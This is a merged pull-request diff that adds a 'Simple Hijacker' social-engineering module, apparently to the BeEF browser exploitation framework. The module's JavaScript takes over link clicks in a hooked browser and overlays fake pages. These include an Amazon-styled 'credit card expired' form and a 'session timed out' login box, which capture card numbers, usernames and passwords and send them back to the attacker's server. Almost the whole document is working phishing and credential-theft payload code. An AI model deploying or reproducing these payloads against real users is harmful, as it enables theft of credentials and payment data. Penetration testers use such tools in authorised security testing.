Merge pull request #740 from gallypette/master
Simple_hijacker module (Social engineering): Awesome, merging it straight away ;)
This commit is contained in:
Michele Orru
43
modules/social_engineering/simple_hijacker/command.js
Normal file
43
modules/social_engineering/simple_hijacker/command.js
Normal file
@@ -0,0 +1,43 @@
|
||||
//
|
||||
// Copyright 2012 Wade Alcorn wade@bindshell.net
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
//
|
||||
|
||||
hijack = function(){
|
||||
function send(answer){
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
|
||||
}
|
||||
<% target = @targets.split(',') %>
|
||||
$j('a').click(function(e) {
|
||||
e.preventDefault();
|
||||
if ($j(this).attr('href') != '')
|
||||
{
|
||||
if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{
|
||||
<%
|
||||
tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js"
|
||||
file = File.open(tplpath, "r")
|
||||
@template = file.read
|
||||
%>
|
||||
|
||||
<%= @template %>
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
|
||||
}
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
beef.execute(function() {
|
||||
hijack();
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action');
|
||||
});
|
||||
26
modules/social_engineering/simple_hijacker/config.yaml
Normal file
26
modules/social_engineering/simple_hijacker/config.yaml
Normal file
@@ -0,0 +1,26 @@
|
||||
#
|
||||
# Copyright 2012 Wade Alcorn wade@bindshell.net
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
simple_hijacker:
|
||||
enable: true
|
||||
category: "Social Engineering"
|
||||
name: "Simple Hijacker"
|
||||
description: "Hijack clicks on links to display what you want."
|
||||
templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"]
|
||||
authors: ["gallypette"]
|
||||
target:
|
||||
user_notify: ['ALL']
|
||||
48
modules/social_engineering/simple_hijacker/module.rb
Normal file
48
modules/social_engineering/simple_hijacker/module.rb
Normal file
@@ -0,0 +1,48 @@
|
||||
#
|
||||
# Copyright 2012 Wade Alcorn wade@bindshell.net
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
class Simple_hijacker < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
|
||||
config = BeEF::Core::Configuration.instance
|
||||
@templates = config.get('beef.module.simple_hijacker.templates')
|
||||
|
||||
# Defines which domains to target
|
||||
data = []
|
||||
data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'})
|
||||
|
||||
# We'll then list all templates available
|
||||
tmptpl = []
|
||||
@templates.each{ |template|
|
||||
tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
|
||||
raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
|
||||
tmptpl<<[ template]
|
||||
}
|
||||
|
||||
data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"})
|
||||
|
||||
return data
|
||||
end
|
||||
|
||||
#
|
||||
# This method is being called when a zombie sends some
|
||||
# data back to the framework.
|
||||
#
|
||||
def post_execute
|
||||
save({'answer' => @datastore['answer']})
|
||||
end
|
||||
|
||||
end
|
||||
@@ -0,0 +1,28 @@
|
||||
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
|
||||
$j(document).attr('title', $j(this).html());
|
||||
document.body.scroll = 'no';
|
||||
document.documentElement.style.overflow = 'hidden';
|
||||
|
||||
collect = function(){
|
||||
answer = "";
|
||||
$j(":input").each(function() {
|
||||
answer += " "+$j(this).attr("name")+":"+$j(this).val();
|
||||
});
|
||||
send(answer);
|
||||
}
|
||||
|
||||
// floating div
|
||||
function writediv() {
|
||||
sneakydiv = document.createElement('div');
|
||||
sneakydiv.setAttribute('id', 'hax');
|
||||
sneakydiv.setAttribute('display', 'block');
|
||||
sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;');
|
||||
document.body.appendChild(sneakydiv);
|
||||
sneakydiv.innerHTML= '<div style="margin:5px;">Your credit card details expired, please enter your new credit card credential to continue shopping- <br> <b>Changes made to your payment methods will not affect orders you have already placed. </b></div><table cellspacing=0 cellpadding=0 border=0 width="100%"><tbody><tr><td valign=bottom><b class=h1><nobr><a href="#" style="font-size: medium;font-family: verdana,arial,helvetica;color: #004B91;text-decoration: underline;cursor: auto">Your Account</a></nobr>></b><h1 class=h1 style="display: inline; color: #E47911; font-size: medium;font-family: verdana,arial;font-weight: bold"><b class=h1><nobr>Add a Credit or Debit Card</nobr></b></h1></td></table><div width="99%" style="border: 2px solid #DDDDCC; -webkit-border-radius: 10px;border-radius: 10px"><table width="100%" border=0 cellspacing=0 cellpadding=0 align=center><tbody><tr><td valign=middle width="20%" nowrap=nowrap height=28><font color="#660000"><b class=sans> Edit your payment method:</b></font></td><tr><td valign=middle width="100%" nowrap=nowrap><table><tbody><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Cardholder Name:</font></b></td><td><input name=name onchange="collect();" size=25 maxlength=60><br></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Exp. Date:</font></b></td><td><select onchange="collect();" name=newCreditCardMonth title=Month id=newCreditCardMonth><option value=01>01<option value=02>02<option value=03>03<option value=04>04<option value=05>05<option value=06>06<option value=07>07<option value=08>08<option value=09>09<option value=10>10<option value=11 selected>11<option value=12>12</select> <select onchange="collect();" name=newCreditCardYear title=Year id=newCreditCardYear><option value=2011 selected>2011<option value=2012>2012<option value=2013>2013<option value=2014>2014<option value=2015>2015<option value=2016>2016<option value=2017>2017<option value=2018>2018<option value=2019>2019<option value=2020>2020<option value=2021>2021<option value=2022>2022<option value=2023>2023<option value=2024>2024<option value=2025>2025<option value=2026>2026<option value=2027>2027<option value=2028>2028<option value=2029>2029<option value=2030>2030<option value=2031>2031<option value=2032>2032<option value=2033>2033<option value=2034>2034<option value=2035>2035<option value=2036>2036<option value=2037>2037</select></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Number:</font></b></td><td><input name=creditcard onchange="collect();" size=16 maxlength=16><br></td><tr><td colspan=2><hr width="100%" noshade=noshade size=1></td><tr><td align=right></td><td><div id="confirm" style="cursor: hand; border: 2px solid #ffcc55; -webkit-border-radius: 10px;border-radius: 10px;font-family: verdana,arial;font-weight: bold" align=center width="20%"><font face="verdana,arial,helvetica" size=-1>Confirm</font></div></td></table></td></table></div>';
|
||||
}
|
||||
|
||||
writediv();
|
||||
|
||||
$j("#confirm").click(function () {
|
||||
$j('#hax').remove();
|
||||
});
|
||||
File diff suppressed because one or more lines are too long
@@ -0,0 +1,10 @@
|
||||
var answer = confirm("Do you really want to leave us ??")
|
||||
if (answer){
|
||||
alert("Okay :(")
|
||||
send("User chose to leave.");
|
||||
window.location = $j(this).attr('href');
|
||||
}
|
||||
else{
|
||||
alert("Okay enjoy ")
|
||||
send("User chose to stay.");
|
||||
}
|
||||
@@ -0,0 +1,105 @@
|
||||
imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
|
||||
var answer= '';
|
||||
|
||||
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
|
||||
$j(document).attr('title', $j(this).html());
|
||||
document.body.scroll = 'no';
|
||||
document.documentElement.style.overflow = 'hidden';
|
||||
|
||||
// set up darkening
|
||||
function grayOut(vis, options) {
|
||||
// Pass true to gray out screen, false to ungray
|
||||
// options are optional. This is a JSON object with the following (optional) properties
|
||||
// opacity:0-100 // Lower number = less grayout higher = more of a blackout
|
||||
// zindex: # // HTML elements with a higher zindex appear on top of the gray out
|
||||
// bgcolor: (#xxxxxx) // Standard RGB Hex color code
|
||||
// grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
|
||||
// Because options is JSON opacity/zindex/bgcolor are all optional and can appear
|
||||
// in any order. Pass only the properties you need to set.
|
||||
var options = options || {};
|
||||
var zindex = options.zindex || 50;
|
||||
var opacity = options.opacity || 70;
|
||||
var opaque = (opacity / 100);
|
||||
var bgcolor = options.bgcolor || '#000000';
|
||||
var dark=document.getElementById('darkenScreenObject');
|
||||
if (!dark) {
|
||||
// The dark layer doesn't exist, it's never been created. So we'll
|
||||
// create it here and apply some basic styles.
|
||||
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
|
||||
var tbody = document.getElementsByTagName("body")[0];
|
||||
var tnode = document.createElement('div'); // Create the layer.
|
||||
tnode.style.position='absolute'; // Position absolutely
|
||||
tnode.style.top='0px'; // In the top
|
||||
tnode.style.left='0px'; // Left corner of the page
|
||||
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
|
||||
tnode.style.display='none'; // Start out Hidden
|
||||
tnode.id='darkenScreenObject'; // Name it so we can find it later
|
||||
tbody.appendChild(tnode); // Add it to the web page
|
||||
dark=document.getElementById('darkenScreenObject'); // Get the object.
|
||||
}
|
||||
if (vis) {
|
||||
// Calculate the page width and height
|
||||
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
|
||||
var pageWidth = document.body.scrollWidth+'px';
|
||||
var pageHeight = document.body.scrollHeight+'px';
|
||||
} else if( document.body.offsetWidth ) {
|
||||
var pageWidth = document.body.offsetWidth+'px';
|
||||
var pageHeight = document.body.offsetHeight+'px';
|
||||
} else {
|
||||
var pageWidth='100%';
|
||||
var pageHeight='100%';
|
||||
}
|
||||
//set the shader to cover the entire page and make it visible.
|
||||
dark.style.opacity=opaque;
|
||||
dark.style.MozOpacity=opaque;
|
||||
dark.style.filter='alpha(opacity='+opacity+')';
|
||||
dark.style.zIndex=zindex;
|
||||
dark.style.backgroundColor=bgcolor;
|
||||
dark.style.width= pageWidth;
|
||||
dark.style.height= pageHeight;
|
||||
dark.style.display='block';
|
||||
} else {
|
||||
dark.style.display='none';
|
||||
}
|
||||
}
|
||||
|
||||
// function to send response
|
||||
function win(){
|
||||
document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
|
||||
answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
|
||||
}
|
||||
|
||||
// perform darkening
|
||||
grayOut(true);
|
||||
|
||||
function checker(){
|
||||
processval = document.body.lastChild.getElementsByTagName("input")[2].value;
|
||||
if (processval == "Processing..") {
|
||||
uname = document.body.lastChild.getElementsByTagName("input")[0].value;
|
||||
pass = document.body.lastChild.getElementsByTagName("input")[1].value;
|
||||
answer = uname+":"+pass
|
||||
send(answer);
|
||||
// set lastchild invisible
|
||||
document.body.lastChild.setAttribute('style','display:none');
|
||||
// lighten screen
|
||||
grayOut(false);
|
||||
clearInterval(credgrabber);
|
||||
$j('#hax').remove();
|
||||
$j('#darkenScreenObject').remove();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
// floating div
|
||||
function writeit() {
|
||||
sneakydiv = document.createElement('div');
|
||||
sneakydiv.setAttribute('id', 'hax');
|
||||
sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
|
||||
sneakydiv.setAttribute('align', 'center');
|
||||
document.body.appendChild(sneakydiv);
|
||||
sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>';
|
||||
credgrabber = setInterval(checker,1000);
|
||||
|
||||
}
|
||||
|
||||
writeit();
|
||||
Reference in New Issue
Block a user